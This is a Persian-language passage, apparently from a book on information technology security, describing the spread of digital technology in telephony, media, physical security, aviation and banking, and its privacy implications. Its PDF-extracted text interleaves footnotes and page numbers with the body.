ﺍﺳﺖ .ﺻﻨﻌﺖ ﻭ ﻓﻨﺎﻭﺭﻱ ﺍﻣﺮﻭﺯ ﺑﻪ ﺷﺪﺕ ﺩﺭ ﺗﻜﺎﭘﻮﻱ ﻳﺎﻓﺘﻦ ﺭﺍﻫﻲ
ﺑــﺮﺍﻱ ﺗــﻀﻤﻴﻦ ﺍﻣﻨﻴــﺖ ﺯﻳﺮﺳــﺎﺧﺘﻬﺎﻱ ﺧــﻮﺩ ﻫــﺴﺘﻨﺪ ،ﭼﺮﺍﻛــﻪ
ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ﺁﻥ ﺩﺭﻳﺎﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺑﻴﺸﺘﺮ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻨﺘﺮﻧﺖ
ﻧﺎﺷﻲ ﺍﺯ ﻭﺟـﻮﺩ ﺳـﺨﺖﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻧـﺎﺍﻣﻦ ﺩﺭ ﺁﻥ
ﻣﻲﺑﺎﺷﻨﺪ .ﺩﺭ ﺍﻳﻦ ﻣﺤﻴﻂ ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨـﺎﻥ ﻭ ﺍﻋﺘﻤـﺎﺩ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪ،
ﺷﺒﻜﻪ ﻭ ﺩﺍﺩﻩ ﻫﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ ﻧـﺴﺒﺖ ﺑـﻪ ﻣﺤﻴﻄـﻲ ﻛـﻪ ﺩﺭ ﺁﻥ
Online
9
ﺭﻭﺍﺑﻂ ﻛﺎﺭﻱ ﺑﺮ ﺍﺳﺎﺱ ﮔﻔﺘﮕﻮﻫـﺎﻱ ﺭﻭ ﺩﺭ ﺭﻭ ﺍﻧﺠـﺎﻡ ﻣـﻲﮔﻴـﺮﺩ
ﻛﻤﺎﺑﻴﺶ ﺍﺯ ﺍﻫﻤﻴﺖ ﻳﻜﺴﺎﻧﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ.
ﺍﻳﻦ ﻣﻄﻠﺐ ﺩﺭ ﻣﻮﺭﺩ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﻭﺍﺿﺢ ﺍﺳـﺖ:
ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﺳـﻄﺢ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺒﻲ ﺩﺭ ﺯﻳـﺮﺳـﺎﺧﺘﻬﺎﻱ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺧﻮﺩ ﺩﺳﺖ ﻧﻴﺎﻓﺘﻪ ﻭ ﺍﺯ ﺍﺭﺳﺎﻝ ﺍﻃﻼﻋـﺎﺕ ﺧـﻮﻳﺶ ﺑـﻪ
ﻧﺤﻮ ﻣﻄﻠﻮﺑﻲ ﻣﺤﺎﻓﻈﺖ ﻧﻤﻲﻛﻨﻨﺪ ﺷﺎﻳﺴﺘﺔ ﺍﻋﺘﻤﺎﺩ ﻧﺨﻮﺍﻫﻨﺪ ﺑـﻮﺩ
١٠
ﻭ ﺍﺯ ﻛﺎﺭﻭﺍﻥ ﺍﻗﺘﺼﺎﺩ ﻧﻮﻳﻦ ﺟﻬﺎﻧﻲ ﻋﻘﺐ ﺧﻮﺍﻫﻨﺪ ﻣﺎﻧﺪ.
ﺍﻧﻘﻼﺏ ﺩﻳﺠﻴﺘﺎﻝ
ﺍﻣﺮﻭﺯﻩ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﺍﺯ ﺣﻴﻄﺔ ﺭﺍﻳﺎﻧﻪﻫـﺎ ﻓﺮﺍﺗـﺮ ﺭﻓﺘـﻪ ﺍﺳـﺖ.
ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺻﻨﻌﺖ ﻣﻴﻜﺮﻭﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﺍﻣﻜﺎﻥ ﺳﺎﺧﺖ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﭘﻴﭽﻴﺪﺓ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻣﻘﻴﺎﺳﻬﺎﻱ ﺑـﺴﻴﺎﺭ ﻛﻮﭼـﻚ ﺭﺍ
ﻓﺮﺍﻫﻢ ﺁﻭﺭﺩﻩ ﺑﻄﻮﺭﻳﻜﻪ ﺍﻛﻨﻮﻥ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺭﺗﺒﺎﻃﻲ
ﻭ ﻣﺤﺎﺳﺒﺎﺗﻲ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩ ﺭﺍ ﺩﺭ ﺟﻴﺐ ﺧﻮﺩ ﺟﺎﻱ ﺩﻫﻴﺪ .ﻋـﻼﻭﻩ
ﺑﺮ ﺍﻳﻦ ﺑﻬﺒﻮﺩ ﻧﺴﺒﺖ ﻗﻴﻤﺖ ﺑﻪ ﻛﺎﺭﺁﻳﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﻧﻮﻉ ﻓﻨﺎﻭﺭﻱ ﺩﺭ
ﻫﺮ ﺳﺎﻝ ﭼﻴـﺰﻱ ﺣـﺪﻭﺩ %۳۰ﺍﺳـﺖ ﻭ ﺍﺣﺘﻤـﺎﻝ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﻳـﻦ
ﻧﺴﺒﺖ ﺗﺎ ﺩﻩ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﻧﻴﺰ ﺑﺴﻴﺎﺭ ﺑﺎﻻﺳـﺖ ١١.ﺍﻧﺘﻈـﺎﺭ ﻣـﺎ ﺍﻳـﻦ
ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﻣـﻮﺭﺩ ﺍﺳـﺘﻘﺒﺎﻝ ﮔـﺴﺘﺮﺩﻩ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ ﻭ
ﻋﺮﺻﻪﻫﺎﻱ ﻧﻮﻳﻨﻲ ﺩﺭ ﺗﺠﺎﺭﺕ ﭘﺪﻳﺪ ﺁﻭﺭﺩ ﻭ ﻧﻘﻄﺔ ﺷﺮﻭﻋﻲ ﺑـﺮﺍﻱ
ﺁﻏﺎﺯ ﻋﺼﺮ ﻃﻼﻳﻲ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺎﺷﺪ.
ﻼ ﺩﻳﺠﻴﺘــﺎﻟﻲ ﻫــﺴﺘﻨﺪ ﻭ
ﺗﺠﻬﻴــﺰﺍﺕ ﺗﻠﻔﻨــﻲ ﻣــﺪﺭﻥ ﺍﻣــﺮﻭﺯ ﻛــﺎﻣ ﹰ
ﺳﻴـــﺴﺘﻤﻬﺎﻱ ﻫﺪﻓﻤﻨـــﺪ ﺭﺍﻳﺎﻧـــﻪﺍﻱ ﺟـــﺎﻳﮕﺰﻳﻦ ﺗﺠﻬﻴـــﺰﺍﺕ
Switchingﻣﺒﺘﻨﻲ ﺑﺮ ﺭﻟﺔ ﻣﻜﺎﻧﻴﻜﻲ ﺷﺪﻩﺍﻧﺪ .ﺍﺯ ﺯﻣﺎﻥ ﭘﻴﺪﺍﻳﺶ
ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫـﺔ ۸۰ﻣـﻴﻼﺩﻱ ،ﺻـﺪﺍ ﻭ ﻣﻮﺳـﻴﻘﻲ
ﺷﻜﻞ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻪ ﺧﻮﺩ ﮔﺮﻓﺘﻪ ﻭ ﺑـﺎ ﭘﻴـﺪﺍﻳﺶ ﻗﺎﻟـﺐ ﻣﻮﺳـﻴﻘﻲ
MP3ﺩﺭ ﺍﻭﺍﺧــﺮ ﺩﻫــﺔ ۹۰ﻣــﻴﻼﺩﻱ ﺿــﺒﻂ ﺻــﺪﺍ ﺣﺘــﻲ ﺩﺭ
ﻼ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺷﺪﻩ ﺍﺳـﺖ .ﺩﺭ ﺩﻧﻴـﺎﻱ
ﻣﺤﻴﻄﻬﺎﻱ ﺧﺎﻧﮕﻲ ﻧﻴﺰ ﻛﺎﻣ ﹰ
ﻋﻜﺎﺳﻲ ﻭ ﻓﻴﻠﻤﺒـﺮﺩﺍﺭﻱ ﻧﻴـﺰ ﺗـﺼﺎﻭﻳﺮ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻭ ﺩﻭﺭﺑﻴﻨﻬـﺎﻱ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺛﺒﺖ ﺗﺼﺎﻭﻳﺮ ﻓﻴﻠﻤﻬﺎﻱ ﻋﻜﺎﺳﻲ ﮔﺸﺘﻪﺍﻧﺪ.
۱۱
Braga, Carlos Prima, Inclusión or Exclusion,
UNESCO Courier:
http://www.fcc.gov/Bureaus/Miscellaneous/Ne
ws_Releases/1997/nrmc7020.html
ﺍﻳﻦ ﻧﺮﺥ ﭘﻴﺸﺮﻓﺖ ﻓﻨﻲ ﻳﻜﻲ ﺍﺯ ﭘﻴﺎﻣﺪﻫﺎﻱ ﻗـﺎﻧﻮﻥ Moorﺍﺳـﺖ ﻛـﻪ
ﺑﻮﺳﻴﻠﺔ ،Gordon Moorﭘﺪﺭ ﺍﻳﻨﺘﻞ ﺩﺭ ﺩﻫﺔ ۱۹۶۰ﺗﺸﺮﻳﺢ ﺷﺪﻩ .ﺍﻭ
ﻣﻲﮔﻮﻳﺪ ﻃﻲ ﻫﺮ ﺩﻭﺭﺓ ۲ﺳـﺎﻟﻪ )ﻛـﻪ ﺑﻌـﺪﹰﺍ ﺁﻧـﺮﺍ ﺑـﻪ ۱۸ﻣـﺎﻩ ﻛـﺎﻫﺶ ﺩﺍﺩ(
ﻓﻨﺎﻭﺭﻱ ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩﻫﺎﻳﻲ ﺑـﺎ ﻇﺮﻓﻴـﺖ
ﺩﻭﺑﺮﺍﺑﺮ ﻭ ﻗﻴﻤﺖ ﻳﻜﺴﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻨﺪ .ﺍﻳﻦ ﺭﻭﻧﺪ ﻃﻲ ۴۰ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺑﻪ
ﻫﻤﻴﻦ ﻣﻨﻮﺍﻝ ﺑﻮﺩﻩ ﻭ ﺍﻧﺘﻈﺎﺭ ﻣﻲﺭﻭﺩ ﻛﻪ ﺣﺪﺍﻗﻞ ﺗﺎ ۱۰ﺳـﺎﻝ ﺩﻳﮕـﺮ ﻧﻴـﺰ
ﻫﻤﻴﻨﻄﻮﺭ ﺑﺎﺷﺪ.
10
٢٩
ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺗﻠﻔﻨﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ ﺩﺭﺣـﺎﻝ ﺣﺮﻛـﺖ ﺑـﻪ ﺳـﻤﺖ
ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻫﺴﺘﻨﺪ ﻭ ﺑﺎ ﻭﺟﻮﺩ ﭘﺮﻭﺗﻜﻠﻬﺎﻳﻲ ﭼـﻮﻥ ،GSM
TDMA ،CDMAﻭ ﮔﻮﻧﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺁﻧﻬﺎ ﺑﺘﺪﺭﻳﺞ ﺟﺎﻳﮕﺰﻳﻦ
ﻧﺴﻞ ﻗﺪﻳﻤﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻓﻨـﺎﻭﺭﻱ ﺁﻧـﺎﻟﻮﮒ ﺧﻮﺍﻫﻨـﺪ ﺷـﺪ .ﺩﺭ
ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺗﻠﻮﻳﺰﻳﻮﻥ ﺩﻳﺠﻴﺘﺎﻝ ﺑﻪ ﺻﺤﻨﻪ ﺁﻣﺪﻩ ﺍﺳﺖ
ﻭ ﺩﻳﺮﻱ ﻧﺨﻮﺍﻫﺪ ﮔﺬﺷﺖ ﻛﻪ ﺟﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﭘﺨﺶ ﺑﺮﻧﺎﻣـﻪ
ﺭﺍ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ )ﻫﺮﭼﻨﺪ ﻛﻪ ﺍﻳﻦ ﺗﻐﻴﻴﺮ ﻛﻤﻲ ﻛﻨﺪﺗﺮ ﺍﺯ ﺑﻘﻴﻪ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ؛
ﭼﺮﺍﻛﻪ ﺣﺠﻢ ﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﺧﺎﻧﮕﻲ ﻣﻮﺟﻮﺩ ﻛﻪ ﺑـﻪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻗـﺪﻳﻤﻲﺗـﺮ
ﻭﺍﺑﺴﺘﻪﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻭﺳﻴﻊ ﺍﺳﺖ(.
ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﻓﻴﺰﻳﻜــﻲ ﻧﻴــﺰ ﺩﺭﺣــﺎﻝ ﺗﺒــﺪﻳﻞ ﺑــﻪ ﺍﻧــﻮﺍﻉ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﻫﺴﺘﻨﺪ .ﺩﺭ ﻫﺘﻠﻬﺎ ،ﺁﭘﺎﺭﺗﻤﺎﻧﻬـﺎ ﻭ ﺩﻓـﺎﺗﺮ ﺍﺩﺍﺭﻱ،
ﻛﻠﻴﺪﻫﺎﻱ ﻓﻴﺰﻳﻜـﻲ ﺟـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ ﻛﺎﺭﺗﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺩﺍﺩﻩ ﺍﻧﺪ .ﺩﻭﺭﺑﻴﻨﻬﺎﻱ ﺗﻠﻮﻳﺰﻳﻮﻧﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﻧﻈــﺎﺭﺗﻲ ﺳــﺎﺧﺘﻤﺎﻧﻬﺎ ﻭ ﺗﺄﺳﻴــﺴﺎﺕ ﻧﻴــﺰ ﺍﻏﻠــﺐ ﺍﺯ ﺗﺠﻬﻴــﺰﺍﺕ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻨﺪ ﻛـﻪ ﺑﺠـﺎﻱ ﺍﺭﺳـﺎﻝ ﺳـﻴﮕﻨﺎﻟﻬﺎﻱ
ﺗﻠﻮﻳﺰﻳﻮﻧﻲ ﺑﻪ ﻳﻚ ﻣﺎﻧﻴﺘﻮﺭ ﻭﻳﺪﺋﻮﻳﻲ ،ﺗﺼﺎﻭﻳﺮ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺑـﻪ
١٢
ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨـﻴﻢ ﺑـﺪﻭﻥ
ﻭﺟﻮﺩ ﺭﺍﻳﺎﻧﻪ ،ﺷﺒﻜﻪ ﻭ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻗﺎﺑﻞ ﺍﺭﺍﺋﻪ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ.
ﺧﻄــﻮﻁ ﻫــﻮﺍﻳﻲ ﻧﻴــﺰ ﺑــﺪﻭﻥ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺯﺭﻭ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﭘﺮﻭﺍﺯ ﻗﺎﺩﺭ ﺑﻪ ﺭﻗﺎﺑﺖ ﺑـﺎ ﻫـﻢ
ﻧﻴﺴﺘﻨﺪ .ﻫﻮﺍﭘﻴﻤﺎﻫﺎ ﺗﺎ ﺍﻧﺪﺍﺯﺓ ﺯﻳﺎﺩﻱ ﺑﻪ ﺣﺴﮕﺮﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ
ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻭﺍﺑﺴﺘﻪﺍﻧﺪ ﻭ ﺑﺪﻭﻥ ﺁﻧﻬﺎ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺧﻮﺑﻲ
ﻛﺎﺭ ﻛﻨﻨﺪ .ﺣﺘﻲ ﺍﺗﻮﻣﺒﻴﻠﻬﺎ ﻧﻴﺰ ﺑﺮﺍﻱ ﻋﻤﻠﻜﺮﺩ ﻣﻨﺎﺳﺐ ﻭ ﻛﻤﻚ ﺑـﻪ
۱۲
اﻳﻦ ﻣﻮﺭﺩ ﺧﺎﺹ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﺎﻏﻞ ﺭﺍ ﺑﻪ ﺳﻤﺖ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ
ﺗﻮﺳﻌﻪ ﻫﺪﺍﻳﺖ ﻛﻨﺪ .ﺑﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﺗﺼﺎﻭﻳﺮ ﺩﺭ ﻗﺎﻟﺐ ﺩﻳﺠﻴﺘﺎﻝ ﺩﺭﺁﻳﻨﺪ
ﻭ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﻮﻧﺪ ،ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻧﻈـﺎﺭﺕ ﺩﺭ
ﻫﺮ ﻛﺠﺎﻱ ﺷﺒﻜﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﻧﺪ .ﺑﻨﺎﺑﺮ ﭘﻴﺶﺑﻴﻨﻲﻫﺎ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺍﻣﻨﻴﺘﻲ
ﻛﻪ ﺑﻪ ﻣﻬﺎﺭﺕ ﺧﺎﺻﻲ ﻧﻴﺎﺯ ﻧﺪﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ
ﺑﺎ ﻫﺰﻳﻨﺔ ﻛﻤﺘﺮ ﻭ ﻛﻴﻔﻴﺖ ﺑﺮﺍﺑﺮ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﺷـﻮﺩ .ﺍﻳـﻦ ﭘﻴـﺸﻨﻬﺎﺩ ﺩﺭ ﺑـﺎ
ﺍﺳﺘﻘﺒﺎﻝ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻣﻮﺍﺟﻪ ﺷـﺪ ،ﺍﻣـﺎ ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻧـﻮﻉ
ﻭﺍﮔﺬﺍﺭﻱ ﻣﺮﺯﻫﺎﻱ ﻣﻠﻲ ﺩﺭ ﻧﻮﺭﺩﻳﺪﻩ ﻣـﻲﺷـﻮﻧﺪ ،ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﺮﺧـﻲ
ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺑﻪ ﺑﺎﺭ ﺑﻴﺎﻳﻨﺪ.
ﺍﻳﻦ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﺑـﺎ ﺳـﺮﻋﺘﻲ ﺑـﺎﻭﺭﻧﻜﺮﺩﻧﻲ ﺩﺭ ﺷـﺒﻜﻪ
ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ .ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ ﻗﺎﺩﺭ ﺑـﻪ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ
ﺍﻳﻨﺘﺮﻧﺖ ﻫﺴﺘﻨﺪ ﻭ ﺍﺑﺘﺪﺍ ﻗﺎﺩﺭ ﺑﻪ ﺍﺭﺳﺎﻝ ﺻﻮﺕ ﻭ ﺍﻛﻨﻮﻥ ﻗـﺎﺩﺭ ﺑـﻪ
ﻣﺒﺎﺩﻟﺔ ﺗﺼﺎﻭﻳﺮ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﻣـﻲ ﺑﺎﺷـﻨﺪ ﻭ ﺑـﺰﻭﺩﻱ ﺩﺍﺭﺍﻱ
ﻗﺎﺑﻠﻴﺖ GPSﻧﻴﺰ ﺧﻮﺍﻫﻨﺪ ﺷﺪ ﻭ ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴﺐ ﺍﻓﺮﺍﺩﻱ ﻛـﻪ ﺩﺭ
ﻣﻌﺮﺽ ﺧﻄﺮ ﻭ ﺣﺎﺩﺛﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﻨﺪ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺎ ﺩﻗﺘـﻲ
ﺯﻳﺎﺩ ﻭ ﺗﻨﻬﺎ ﺑﺎ ﻳﻚ ﺗﻠﻔﻦ ﻣﻜﺎﻧﻴﺎﺑﻲ ﻛﺮﺩ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺧﺪﻣﺎﺗﻲ ﻛـﻪ
ﺍﻛﻨﻮﻥ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺎ ﻗﺮﺍﺭ ﻣـﻲ ﮔﻴﺮﻧـﺪ -ﻣﺜـﻞ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ
ﺧﻮﺩﭘﺮﺩﺍﺯ ﻛﻪ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﻭ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧـﺪ -
ﺑﺮ ﺍﺳﺎﺱ ﺍﺻﻞ "ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺷﺒﻜﻪ" ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ .ﻧﻘـﻞ ﻭ
ﺍﻧﺘﻘﺎﻻﺕ ﻣﺎﻟﻲ ﻭ ﺍﻋﺘﺒﺎﺭﻱ ﻣﻴﺎﻥﺑﺎﻧﻜﻲ ﻭ ﺑـﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﻭﺍﺑـﺴﺘﮕﻲ
ﺯﻳﺎﺩﻱ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﻣﺎﻟﻲ ﺩﺍﺭﻧـﺪ ١٤.ﺍﻣـﺮﻭﺯﻩ ﻧﻘـﻞ ﻭ
ﺍﻧﺘﻘﺎﻻﺕ ﺑﺎﻧﻜﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩ
ﻣﻴﺴﺮ ﺍﺳﺖ.
ﻲ ﺩﻳﺠﻴﺘﺎﻝ ﻭ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ
ﺗﻮﺳﻌﺔ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ
ﻫﻢ ﻓﻮﺍﻳﺪ ﺑـﺴﻴﺎﺭﻱ ﺩﺍﺭﺩ؛ ﻭﻟـﻲ ﻧﻜـﺎﺕ ﻣﻨﻔـﻲ ﻧﻴـﺰ ﺩﺭ ﺁﻥ ﻗﺎﺑـﻞ
ﻣﺸﺎﻫﺪﻩ ﺍﺳﺖ .ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻣﺤﻞ ﺍﺳﺘﻘﺮﺍﺭ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺁﺳﺎﻧﺘﺮ
ﺷﺪﻩ ﺍﺳﺖ .ﺩﻳـﺪﻥ ﺻـﻔﺤﺎﺕ ﺗﺒﻠﻴﻐـﺎﺗﻲ ﻭﺏ ،ﻳـﺎﻓﺘﻦ ﺁﻧﭽـﻪ ﻛـﻪ
ﺑﺪﻧﺒﺎﻝ ﺧﺮﻳﺪ ﺁﻥ ﺩﺭ ﻣﻐـﺎﺯﻩﻫـﺎ ﻫـﺴﺘﻴﺪ ،ﻭ ﻣـﺸﺎﻫﺪﺓ ﺁﻧﭽـﻪ ﻛـﻪ
ﺩﺭﺣﺎﻝ ﺗﻤﺎﺷﺎ ﻳﺎ ﺧﻮﺍﻧﺪﻥ ﺑﺼﻮﺭﺕ ﺑﺮﺧﻂ ﻫﺴﺘﻴﺪ ﻧﻴﺰ ﺳـﺎﺩﻩﺗـﺮ ﺍﺯ
ﻗﺒﻞ ﻣﻲﺑﺎﺷﺪ .ﺍﮔﺮ ﭼﻨﻴﻦ ﻧﻈﺎﺭﺗﻲ ﺑـﺮ ﻣﻨـﺎﻓﻊ ﺷـﻤﺎ ﺣـﺎﻛﻢ ﺑﺎﺷـﺪ
ﻗﺎﻋﺪﺗﹰﺎ ﺷـﻤﺎ ﺍﺯ ﺁﻥ ﺑـﺎﺧﺒﺮ ﻧﺨﻮﺍﻫﻴـﺪ ﺷـﺪ ،ﺍﻣـﺎ ﺷـﺎﻳﺪ ﺑﺨﻮﺍﻫﻴـﺪ
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﭼﻨـﻴﻦ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﺑـﺎ ﻛـﺴﺐ ﺍﺟـﺎﺯﻩ ﺍﺯ ﺷـﻤﺎ
ﺟﻤﻊﺁﻭﺭﻱ ﻣﻲﺷﻮﻧﺪ ﻭ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻓﻲ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﻧـﺪ ﻛـﻪ ﺍﺯ
Global Positioning System
۱۴
ﺷﺒﻜﺔ ﺗﺒﺎﺩﻝ ﻣﺎﻟﻲ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎ ﺩﺭ ﮔﺬﺷﺘﻪ ﺍﺯ ﻳـﻚ ﺷـﺒﻜﺔ ﺍﺧﺘـﺼﺎﺻﻲ
ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦ ﻛﻪ ﺑﺮﺍﻱ ﻫﻤﻴﻦ ﻫﺪﻑ ﺧﺎﺹ ﻃﺮﺍﺣﻲ ﺷـﺪﻩ ﺑـﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﺮﺩ ﻭ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﻣﺘﺼﻞ ﻧﺒﻮﺩ .ﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﺑـﺎ ﺩﺭﻧﻈـﺮ ﮔـﺮﻓﺘﻦ
